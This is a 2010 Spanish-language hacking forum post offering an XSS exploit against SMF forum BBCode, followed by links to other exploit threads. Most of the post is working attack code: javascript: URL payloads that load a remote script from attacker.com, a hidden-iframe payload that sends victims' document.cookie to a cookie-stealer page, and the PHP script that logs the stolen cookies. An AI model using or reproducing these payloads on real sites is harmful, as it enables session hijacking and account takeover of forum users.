3. XSS BBCode Exploit SMF All Versions
Páginas: [1]   Ir Abajo
« anterior próximo »

XSS BBCode Exploit SMF All Versions

  • 0 Respuestas
  • 2879 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado dracko.rx

  • *
  • Underc0der
  • Mensajes: 247
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • http://rax0rnet.blogspot.com/
    • Email

XSS BBCode Exploit SMF All Versions

  • en: Febrero 25, 2010, 11:19:12 am
Author: Xianur0

BBCode of the smf not filtered properly specified urls:

Código: [Seleccionar]
[center][size=14pt][url=javascript:alert('xss')]Saltando Filtro
:D...[/url][/size]
[url=javascript:document.write(unescape(%3Cscript+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fexploit.js%22%3E%3C%2Fscript%3E))][img]http://img508.imageshack.us/img508/6982/flmnetworkuserbar494abfyb2.png[/img][/center]
Click on the image, run the javascript..

BBC Cookie Exploit:

Código: [Seleccionar]
[center][size=14pt][url=][/url][/size]
[url=javascript:
document.write(unescape('%3Ciframe+width%3D%220%25%22+height%3D%220%25%22+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fcookiestealer.php%3Fcookie%3D%27+%2Bdocument.cookie+%2B%27+frameborder%3D%220%25%22%3E'));][img]http://www.google.com.mx/intl/es_mx/images/logo.gif[/img][/center]
PHP Cookie Stealer:

Código: [Seleccionar]
<?php
$cookie $_GET['cookie'];
$handler fopen('cookies.txt''a');
fwrite($handler$cookie."\n");
?>
En línea
Venta de diseños - Contactar por MP

http://rax0rnet.blogspot.com/
Páginas: [1]   Ir Arriba
« anterior próximo »
 

Exploit para Apache Struts (ejecución remota de comandos) [Tomcat]|CVE2017-5638

Iniciado por Eschiclers

 Respuestas: 9
Vistas: 8394 		Último mensaje Marzo 23, 2017, 03:57:38 pm
por zoro248
[Video/ing] Ms Word Office Silent Exploit Builder RECODED from scratch FUD 2016

Iniciado por simdia

 Respuestas: 0
Vistas: 3497 		Último mensaje Diciembre 25, 2015, 08:40:37 am
por simdia
Nuevo Exploit 0day para Internet Explorer 7, 8, 9 en Windows XP, Vista y 7

Iniciado por CalebBucker

 Respuestas: 1
Vistas: 4116 		Último mensaje Septiembre 17, 2012, 04:49:25 pm
por Slore
MS14-060 Microsoft Windows OLE Package Manager Code Execution Exploit

Iniciado por Stuxnet

 Respuestas: 1
Vistas: 4969 		Último mensaje Octubre 24, 2014, 09:18:14 pm
por zekurity
[Symlink] + Bypass AdminPanel Joomla + Exploit 0day Java7

Iniciado por CalebBucker

 Respuestas: 1
Vistas: 3298 		Último mensaje Septiembre 06, 2012, 03:26:16 pm
por hdbreaker